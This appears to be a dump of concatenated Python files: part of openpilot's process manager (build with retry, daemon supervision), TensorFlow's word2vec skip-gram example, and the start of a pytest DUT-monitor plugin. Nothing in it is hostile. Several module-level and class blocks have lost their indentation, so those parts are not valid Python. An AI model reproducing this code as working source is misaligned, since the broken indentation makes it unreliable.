    fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)

    while True:
      try:
        dat = os.read(child_pty, 4096)
      except OSError as e:
        # EIO from a pty read means the child side closed (child exited)
        if e.errno == errno.EIO:
          break
        continue

      if not dat:
        break

      try:
        sys.stdout.write(dat.decode('utf8'))
      except (OSError, IOError, UnicodeDecodeError):
        pass

    # os.wait() returns a tuple with the pid and a 16 bit value
    # whose low byte is the signal number and whose high byte is the exit status
    exit_status = os.wait()[1] >> 8
    os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
  """Run the scons build, reporting progress on the spinner.

  On failure: once, clean the caches and retry; on a second failure show
  the collected compile errors in a TextWindow and exit.
  """
  env = os.environ.copy()
  env['SCONS_PROGRESS'] = "1"
  env['SCONS_CACHE'] = "1"

  nproc = os.cpu_count()
  # NOTE(review): when nproc is None this passes an empty-string argument
  # to scons rather than omitting the flag entirely -- confirm scons
  # tolerates an empty argv element.
  j_flag = "" if nproc is None else f"-j{nproc - 1}"

  for retry in [True, False]:
    scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)

    compile_output = []

    # Read progress from stderr and update spinner
    while scons.poll() is None:
      try:
        line = scons.stderr.readline()
        if line is None:
          continue
        line = line.rstrip()

        # scons emits "progress: <n>" lines on stderr when SCONS_PROGRESS=1
        prefix = b'progress: '
        if line.startswith(prefix):
          i = int(line[len(prefix):])
          spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
        elif len(line):
          compile_output.append(line)
          print(line.decode('utf8', 'replace'))
      except Exception:
        pass

    if scons.returncode != 0:
      # Read remaining output
      r = scons.stderr.read().split(b'\n')
      compile_output += r

      if retry:
        if not os.getenv("CI"):
          print("scons build failed, cleaning in")
          for i in range(3, -1, -1):
            print("....%d" % i)
            time.sleep(1)
          subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
          shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
          shutil.rmtree("/data/scons_cache", ignore_errors=True)
        else:
          # in CI a clean retry would just mask flakiness; fail fast
          print("scons build failed after retry")
          sys.exit(1)
      else:
        # Build failed log errors
        errors = [line.decode('utf8', 'replace') for line in compile_output
                  if any([err in line for err in [b'error: ', b'not found, needed by target']])]
        error_s = "\n".join(errors)
        add_logentries_handler(cloudlog)
        cloudlog.error("scons build failed\n" + error_s)

        # Show TextWindow
        spinner.close()
        error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
        with TextWindow("openpilot failed to build\n \n" + error_s) as t:
          t.wait_for_exit()
        exit(1)
    else:
      break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
from selfdrive.registration import register
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
  """Return the module-level dict of currently running managed Processes."""
  return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
  """Register an additional managed process at runtime.

  car_started=True processes run only while the car is started;
  otherwise the process is persistent.
  """
  global managed_processes, car_started_processes, persistent_processes
  managed_processes[name] = desc
  target_list = car_started_processes if car_started else persistent_processes
  target_list.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
  """Replace this (forked) process image with the native binary pargs[0]."""
  # exec the process
  os.chdir(cwd)

  # because when extracted from pex zips permissions get lost -_-
  os.chmod(pargs[0], 0o700)

  # never returns on success
  os.execvp(pargs[0], pargs)
def start_managed_process(name):
  """Start managed process `name` unless unknown or already running.

  A string entry in managed_processes is a python module launched via
  selfdrive.launcher; a (dir, argv) tuple is a native binary exec'd
  after chdir into BASEDIR/dir.
  """
  if name in running or name not in managed_processes:
    return
  proc = managed_processes[name]
  if isinstance(proc, str):
    cloudlog.info("starting python %s" % proc)
    running[name] = Process(name=name, target=launcher, args=(proc,))
  else:
    pdir, pargs = proc
    cwd = os.path.join(BASEDIR, pdir)
    cloudlog.info("starting process %s" % name)
    running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
  running[name].start()
def start_daemon_process(name):
  """Start a detached daemon process unless it is already running.

  The daemon's pid is persisted in Params under its pid_param key. If a
  live process with that pid still has the module name in its cmdline,
  the daemon is considered running and nothing is done.
  """
  params = Params()
  proc, pid_param = daemon_processes[name]
  pid = params.get(pid_param, encoding='utf-8')

  if pid is not None:
    try:
      # signal 0 only checks that the pid exists (raises if dead)
      os.kill(int(pid), 0)
      with open(f'/proc/{pid}/cmdline') as f:
        if proc in f.read():
          # daemon is running
          return
    except OSError:
      # process is dead (FileNotFoundError for the missing /proc entry is
      # an OSError subclass, so one clause covers both)
      pass

  cloudlog.info("starting daemon %s" % name)
  proc = subprocess.Popen(['python', '-m', proc],  # pylint: disable=subprocess-popen-preexec-fn
                          stdin=open('/dev/null', 'r'),
                          stdout=open('/dev/null', 'w'),
                          stderr=open('/dev/null', 'w'),
                          preexec_fn=os.setpgrp)

  params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
  """Prepare a managed process: pre-import python modules, optionally
  (re)build native ones that have a SConscript.

  Falls back to a clean rebuild if the incremental build fails.
  """
  proc = managed_processes[p]
  if isinstance(proc, str):
    # import this python
    cloudlog.info("preimporting %s" % proc)
    importlib.import_module(proc)
  elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
    # build this process
    cloudlog.info("building %s" % (proc,))
    try:
      # "-u" (search up for the SConstruct root) was previously passed as
      # the bare target "u", which scons would treat as a build target;
      # the clean-and-retry path below already used "-u" correctly.
      subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
    except subprocess.CalledProcessError:
      # clean and retry if the build failed
      cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
      subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
      subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
  """Wait up to `timeout` seconds for `process` to exit, by polling.

  Process().join(timeout) can hang due to a python 3 bug:
  https://bugs.python.org/issue28382 -- so poll the exitcode instead.
  """
  deadline = time.time() + timeout
  while process.exitcode is None and time.time() < deadline:
    time.sleep(0.001)
def kill_managed_process(name, retry=True):
  """Stop a managed process and return its exit code.

  Sends SIGINT (or SIGKILL for processes in kill_processes), waits up to
  5s, then escalates. Processes in unkillable_processes get 15 extra
  seconds before the device is rebooted. Raises if retry is False and
  the process does not die.
  """
  if name not in running or name not in managed_processes:
    return
  cloudlog.info(f"killing {name}")

  if running[name].exitcode is None:
    sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
    os.kill(running[name].pid, sig)

    join_process(running[name], 5)

    if running[name].exitcode is None:
      if not retry:
        raise Exception(f"{name} failed to die")

      if name in unkillable_processes:
        # SIGKILL is unsafe here (see unkillable_processes comment above);
        # give it more time, then reboot rather than force-kill
        cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
        join_process(running[name], 15)

        if running[name].exitcode is None:
          cloudlog.critical("unkillable process %s failed to die!" % name)
          os.system("date >> /data/unkillable_reboot")
          os.sync()
          HARDWARE.reboot()
          raise RuntimeError
      else:
        cloudlog.info("killing %s with SIGKILL" % name)
        os.kill(running[name].pid, signal.SIGKILL)
        running[name].join()

  ret = running[name].exitcode
  cloudlog.info(f"{name} is dead with {ret}")
  del running[name]

  return ret
def cleanup_all_processes(signal, frame):
  """Signal handler: disable offroad apks (EON) and kill every running
  managed process.

  NOTE(review): the `signal` parameter shadows the imported signal
  module inside this function; harmless here since the module isn't
  referenced in the body, but worth renaming eventually.
  """
  cloudlog.info("caught ctrl-c %s %s" % (signal, frame))

  if EON:
    pm_apply_packages('disable')

  # list() because kill_managed_process mutates `running` while we iterate
  for name in list(running.keys()):
    kill_managed_process(name)
  cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
  """Deliver `sig` to managed process `name` if it is known and alive."""
  proc = running.get(name)
  if proc is None or name not in managed_processes or proc.exitcode is not None:
    return

  cloudlog.info(f"sending signal {sig} to {name}")
  os.kill(proc.pid, sig)
# ****************** run loop ******************
def manager_init():
  """One-time setup: msgq dir, server registration, logging context,
  log dir, and (on EON) filesystem permissions for the apks."""
  # Create folders needed for msgq
  try:
    os.mkdir("/dev/shm")
  except FileExistsError:
    pass
  except PermissionError:
    print("WARNING: failed to make /dev/shm")

  # set dongle id
  reg_res = register(spinner)
  if reg_res:
    dongle_id = reg_res
  else:
    raise Exception("server registration failed")
  os.environ['DONGLE_ID'] = dongle_id

  if not dirty:
    os.environ['CLEAN'] = '1'

  cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
  crash.bind_user(id=dongle_id)
  crash.bind_extra(version=version, dirty=dirty, is_eon=True)

  # world-writable log root so all processes can write segments
  os.umask(0)
  try:
    os.mkdir(ROOT, 0o777)
  except OSError:
    pass

  # ensure shared libraries are readable by apks
  if EON:
    os.chmod(BASEDIR, 0o755)
    os.chmod("/dev/shm", 0o777)
    os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
    os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
  """Main supervision loop.

  Starts daemons and persistent processes, then starts/stops
  car_started and driver_view processes based on thermald messages,
  until DoUninstall is requested.
  """
  cloudlog.info("manager start")
  cloudlog.info({"environ": os.environ})

  # save boot log
  subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))

  # start daemon processes
  for p in daemon_processes:
    start_daemon_process(p)

  # start persistent processes
  for p in persistent_processes:
    start_managed_process(p)

  # start offroad
  if EON:
    pm_apply_packages('enable')
    start_offroad()

  if os.getenv("NOBOARD") is not None:
    del managed_processes["pandad"]

  if os.getenv("BLOCK") is not None:
    for k in os.getenv("BLOCK").split(","):
      del managed_processes[k]

  started_prev = False
  logger_dead = False
  params = Params()
  thermal_sock = messaging.sub_sock('thermal')

  while 1:
    msg = messaging.recv_sock(thermal_sock, wait=True)

    # stop logging when storage is nearly full
    if msg.thermal.freeSpace < 0.05:
      logger_dead = True

    if msg.thermal.started:
      for p in car_started_processes:
        if p == "loggerd" and logger_dead:
          kill_managed_process(p)
        else:
          start_managed_process(p)
    else:
      logger_dead = False
      driver_view = params.get("IsDriverViewEnabled") == b"1"

      # TODO: refactor how manager manages processes
      for p in reversed(car_started_processes):
        if p not in driver_view_processes or not driver_view:
          kill_managed_process(p)

      for p in driver_view_processes:
        if driver_view:
          start_managed_process(p)
        else:
          kill_managed_process(p)

      # trigger an update after going offroad
      if started_prev:
        os.sync()
        send_managed_process_signal("updated", signal.SIGHUP)

    started_prev = msg.thermal.started

    # check the status of all processes, did any of them die?
    # (green = alive, red = dead, via ANSI color codes)
    running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
    cloudlog.debug(' '.join(running_list))

    # Exit main loop when uninstall is needed
    if params.get("DoUninstall", encoding='utf8') == "1":
      break
def manager_prepare():
  """Prepare (pre-import / build) every managed process, driving the
  spinner over the remaining progress budget."""
  os.chdir(os.path.dirname(os.path.abspath(__file__)))

  # the scons build already consumed the first MAX_BUILD_PROGRESS percent
  done = 0.0 if PREBUILT else float(MAX_BUILD_PROGRESS)
  remaining = 100.0 - done
  count = len(managed_processes)
  for idx, proc_name in enumerate(managed_processes):
    spinner.update_progress(done + remaining * (idx + 1) / count, 100.)
    prepare_managed_process(proc_name)
def main():
  """Entry point: seed default Params, run init/prepare, then supervise
  via manager_thread; always clean up child processes on exit."""
  params = Params()
  params.manager_start()

  default_params = [
    ("CommunityFeaturesToggle", "0"),
    ("CompletedTrainingVersion", "0"),
    ("IsRHD", "0"),
    ("IsMetric", "0"),
    ("RecordFront", "0"),
    ("HasAcceptedTerms", "0"),
    ("HasCompletedSetup", "0"),
    ("IsUploadRawEnabled", "1"),
    ("IsLdwEnabled", "1"),
    ("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
    ("OpenpilotEnabledToggle", "1"),
    ("LaneChangeEnabled", "1"),
    ("IsDriverViewEnabled", "0"),
  ]

  # set unset params
  for k, v in default_params:
    if params.get(k) is None:
      params.put(k, v)

  # is this dashcam?
  if os.getenv("PASSIVE") is not None:
    params.put("Passive", str(int(os.getenv("PASSIVE"))))

  if params.get("Passive") is None:
    raise Exception("Passive must be set to continue")

  if EON:
    update_apks()

  manager_init()
  manager_prepare()
  spinner.close()

  if os.getenv("PREPAREONLY") is not None:
    return

  # SystemExit on sigterm
  signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))

  try:
    manager_thread()
  except Exception:
    traceback.print_exc()
    crash.capture_exception()
  finally:
    # always tear children down, even after a crash
    cleanup_all_processes(None, None)

  if params.get("DoUninstall", encoding='utf8') == "1":
    cloudlog.warning("uninstalling")
    HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
word2vec_optimized.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the _targets word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
  """Options used by our word2vec model.

  Snapshots all relevant command-line FLAGS values at construction time.
  """

  def __init__(self):
    # Model options: embedding dimension.
    self.emb_dim = FLAGS.embedding_size

    # Training options.
    self.train_data = FLAGS.train_data          # training text file
    self.num_samples = FLAGS.num_neg_samples    # negative samples per example
    self.learning_rate = FLAGS.learning_rate    # initial learning rate
    # After this many epochs the linearly-decayed learning rate reaches
    # zero and training stops.
    self.epochs_to_train = FLAGS.epochs_to_train
    self.concurrent_steps = FLAGS.concurrent_steps
    self.batch_size = FLAGS.batch_size          # examples per training step
    self.window_size = FLAGS.window_size        # words predicted left/right
    self.min_count = FLAGS.min_count            # min occurrences for vocab
    self.subsample = FLAGS.subsample            # subsampling threshold
    self.save_path = FLAGS.save_path            # where to write summaries

    # Eval options: the analogy question file.
    self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
  def __init__(self, options, session):
    """Build the training and eval graphs, save the vocab, and load the
    analogy eval data."""
    self._options = options
    self._session = session
    self._word2id = {}   # word (bytes) -> vocab id
    self._id2word = []   # vocab id -> word (bytes)
    self.build_graph()
    self.build_eval_graph()
    self.save_vocab()
    self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
  def build_graph(self):
    """Build the training graph: skipgram input op, embedding variables,
    learning-rate decay, and the neg_train SGD update op."""
    opts = self._options
    # The training data. A text file.
    (words, counts, words_per_epoch, current_epoch, total_words_processed,
     examples, labels) = word2vec.skipgram(filename=opts.train_data,
                                           batch_size=opts.batch_size,
                                           window_size=opts.window_size,
                                           min_count=opts.min_count,
                                           subsample=opts.subsample)
    # materialize the vocab tensors once so python-side code can use them
    (opts.vocab_words, opts.vocab_counts,
     opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
    opts.vocab_size = len(opts.vocab_words)
    print("Data file: ", opts.train_data)
    print("Vocab size: ", opts.vocab_size - 1, " + UNK")
    print("Words per epoch: ", opts.words_per_epoch)

    self._id2word = opts.vocab_words
    for i, w in enumerate(self._id2word):
      self._word2id[w] = i

    # Declare all variables we need.
    # Input words embedding: [vocab_size, emb_dim]
    w_in = tf.Variable(
        tf.random_uniform(
            [opts.vocab_size,
             opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
        name="w_in")

    # Output (softmax) weights: [vocab_size, emb_dim], zero-initialized.
    w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")

    # Global step: []
    global_step = tf.Variable(0, name="global_step")

    # Linear learning rate decay (floored at 0.0001 of the initial rate).
    words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
    lr = opts.learning_rate * tf.maximum(
        0.0001,
        1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)

    # Training nodes.
    inc = global_step.assign_add(1)
    with tf.control_dependencies([inc]):
      train = word2vec.neg_train(w_in,
                                 w_out,
                                 examples,
                                 labels,
                                 lr,
                                 vocab_count=opts.vocab_counts.tolist(),
                                 num_negative_samples=opts.num_samples)

    self._w_in = w_in
    self._examples = examples
    self._labels = labels
    self._lr = lr
    self._train = train
    self.step = global_step
    self._epoch = current_epoch
    self._words = total_words_processed
def save_vocab(self):
    """Save the vocabulary to a file so the model can be reloaded."""
    opts = self._options
    vocab_path = os.path.join(opts.save_path, "vocab.txt")
    # One "<word> <count>" pair per line, in vocabulary-id order.
    with open(vocab_path, "w") as vocab_file:
        for index in xrange(opts.vocab_size):
            word = tf.compat.as_text(opts.vocab_words[index])
            vocab_file.write("%s %d\n" % (word, opts.vocab_counts[index]))
def build_eval_graph(self):
    """Build the evaluation graph (analogy prediction and nearest neighbors)."""
    # Eval graph
    opts = self._options
    # Each analogy task is to predict the 4th word (d) given three
    # words: a, b, c. E.g., a=italy, b=rome, c=france, we should
    # predict d=paris.
    # The eval feeds three vectors of word ids for a, b, c, each of
    # which is of size N, where N is the number of analogies we want to
    # evaluate in one batch.
    analogy_a = tf.placeholder(dtype=tf.int32)  # [N]
    analogy_b = tf.placeholder(dtype=tf.int32)  # [N]
    analogy_c = tf.placeholder(dtype=tf.int32)  # [N]
    # Normalized word embeddings of shape [vocab_size, emb_dim].
    nemb = tf.nn.l2_normalize(self._w_in, 1)
    # Each row of a_emb, b_emb, c_emb is a word's embedding vector.
    # They all have the shape [N, emb_dim]
    a_emb = tf.gather(nemb, analogy_a)  # a's embs
    b_emb = tf.gather(nemb, analogy_b)  # b's embs
    c_emb = tf.gather(nemb, analogy_c)  # c's embs
    # We expect that d's embedding vectors on the unit hyper-sphere is
    # near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
    target = c_emb + (b_emb - a_emb)
    # Compute cosine distance between each pair of target and vocab
    # (dot product of unit vectors). dist has shape [N, vocab_size].
    dist = tf.matmul(target, nemb, transpose_b=True)
    # For each question (row in dist), find the top 4 words.
    _, pred_idx = tf.nn.top_k(dist, 4)
    # Nodes for computing neighbors for a given word according to
    # their cosine distance.
    nearby_word = tf.placeholder(dtype=tf.int32)  # word id
    nearby_emb = tf.gather(nemb, nearby_word)
    nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
    nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
                                         min(1000, opts.vocab_size))
    # Nodes in the constructed graph which are used by training and
    # evaluation to run/feed/fetch.
    self._analogy_a = analogy_a
    self._analogy_b = analogy_b
    self._analogy_c = analogy_c
    self._analogy_pred_idx = pred_idx
    self._nearby_word = nearby_word
    self._nearby_val = nearby_val
    self._nearby_idx = nearby_idx
    # Properly initialize all variables.
    # NOTE(review): tf.initialize_all_variables() is the legacy pre-1.0 API;
    # this file targets an old TensorFlow release.
    tf.initialize_all_variables().run()
    self.saver = tf.train.Saver()
def _train_thread_body(self):
    """Worker loop: run training steps until the epoch counter advances."""
    start_epoch, = self._session.run([self._epoch])
    epoch = start_epoch
    # Each iteration performs one neg_train step; the loop ends as soon as
    # the input pipeline reports a new epoch.
    while epoch == start_epoch:
        _, epoch = self._session.run([self._train, self._epoch])
def train(self):
    """Train the model for one epoch using concurrent worker threads.

    Spawns opts.concurrent_steps threads, each running _train_thread_body,
    and prints a progress line every 5 seconds until the epoch advances.
    """
    opts = self._options
    initial_epoch, initial_words = self._session.run([self._epoch, self._words])
    workers = []
    for _ in xrange(opts.concurrent_steps):
        t = threading.Thread(target=self._train_thread_body)
        t.start()
        workers.append(t)
    # Progress-reporting loop: compute words/sec over each 5 s window.
    last_words, last_time = initial_words, time.time()
    while True:
        time.sleep(5)  # Reports our progress once a while.
        (epoch, step, words,
         lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
        now = time.time()
        # Rate over the last window; RHS is evaluated before rebinding.
        last_words, last_time, rate = words, now, (words - last_words) / (
            now - last_time)
        # '\r' + end="" keeps the progress on a single console line.
        print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
                                                                      lr, rate),
              end="")
        sys.stdout.flush()
        if epoch != initial_epoch:
            break
    # Wait for all workers to observe the epoch change and exit.
    for t in workers:
        t.join()
def _predict(self, analogy):
    """Predict the top 4 answers for analogy questions.

    Args:
        analogy: int array of shape [N, >=3]; columns 0..2 hold the
            word ids of a, b, c.

    Returns:
        int array [N, 4] of predicted word ids, best first.
    """
    feed = {
        self._analogy_a: analogy[:, 0],
        self._analogy_b: analogy[:, 1],
        self._analogy_c: analogy[:, 2],
    }
    idx, = self._session.run([self._analogy_pred_idx], feed)
    return idx
def eval(self):
    """Evaluate analogy questions and report accuracy.

    Iterates over self._analogy_questions in batches, counting a question
    as correct when the expected answer appears among the top predictions
    before any word not belonging to the question itself.
    """
    # How many questions we get right at precision@1.
    correct = 0
    # NOTE(review): the final division raises ZeroDivisionError when no
    # analogy questions were loaded (total == 0) — confirm callers guard this.
    total = self._analogy_questions.shape[0]
    start = 0
    while start < total:
        limit = start + 2500  # evaluate in batches of up to 2500 questions
        sub = self._analogy_questions[start:limit, :]
        idx = self._predict(sub)
        start = limit
        for question in xrange(sub.shape[0]):
            # Scan the top-4 predictions in rank order.
            for j in xrange(4):
                if idx[question, j] == sub[question, 3]:
                    # Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
                    correct += 1
                    break
                elif idx[question, j] in sub[question, :3]:
                    # We need to skip words already in the question.
                    continue
                else:
                    # The correct label is not the precision@1
                    break
    print()
    print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
                                              correct * 100.0 / total))
def analogy(self, w0, w1, w2):
    """Predict word w3 as in w0:w1 vs w2:w3.

    Unknown words map to id 0; returns "unknown" when every predicted
    candidate is one of the query words.
    """
    query_ids = np.array([[self._word2id.get(word, 0) for word in (w0, w1, w2)]])
    predictions = self._predict(query_ids)
    # Take the best-ranked candidate that is not part of the question.
    for candidate in (self._id2word[i] for i in predictions[0, :]):
        if candidate not in (w0, w1, w2):
            return candidate
    return "unknown"
def nearby(self, words, num=20):
    """Prints out nearby words given a list of words."""
    word_ids = np.array([self._word2id.get(word, 0) for word in words])
    vals, idx = self._session.run(
        [self._nearby_val, self._nearby_idx], {self._nearby_word: word_ids})
    # One section per query word: header plus the top `num` neighbors.
    for i, word in enumerate(words):
        print("\n%s\n=====================================" % (word))
        for neighbor_id, distance in zip(idx[i, :num], vals[i, :num]):
            print("%-20s %6.4f" % (self._id2word[neighbor_id], distance))
def _start_shell(local_ns=None):
    """Drop into an interactive IPython shell (useful for debugging/development).

    Module globals take precedence over the caller-supplied namespace.
    """
    import IPython
    shell_ns = {}
    if local_ns:
        shell_ns.update(local_ns)
    shell_ns.update(globals())
    IPython.start_ipython(argv=[], user_ns=shell_ns)
def main(_):
    """Train a word2vec model."""
    # All three paths are mandatory; fail fast with a usage hint otherwise.
    if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
        print("--train_data --eval_data and --save_path must be specified.")
        sys.exit(1)
    opts = Options()
    with tf.Graph().as_default(), tf.Session() as session:
        # NOTE(review): pinned to CPU — presumably because the custom word2vec
        # ops only have CPU kernels; confirm before changing.
        with tf.device("/cpu:0"):
            model = Word2Vec(opts, session)
        for _ in xrange(opts.epochs_to_train):
            model.train()  # Process one epoch
            model.eval()  # Eval analogies.
        # Perform a final save.
        model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
                         global_step=model.step)
        if FLAGS.interactive:
            # E.g.,
            # [0]: model.analogy(b'france', b'paris', b'russia')
            # [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
            _start_shell(locals())
if __name__ == "__main__":
    tf.app.run()  # parse flags, then dispatch to main()
|
pytest_dut_monitor.py | import pytest
import paramiko
import threading
import logging
import time
import os
import yaml
from collections import OrderedDict
from datetime import datetime
from errors import HDDThresholdExceeded, RAMThresholdExceeded, CPUThresholdExceeded
logger = logging.getLogger(__name__)

# Paths on the DUT: the uploaded monitor script and its measurement logs.
DUT_MONITOR = "/tmp/dut_monitor.py"
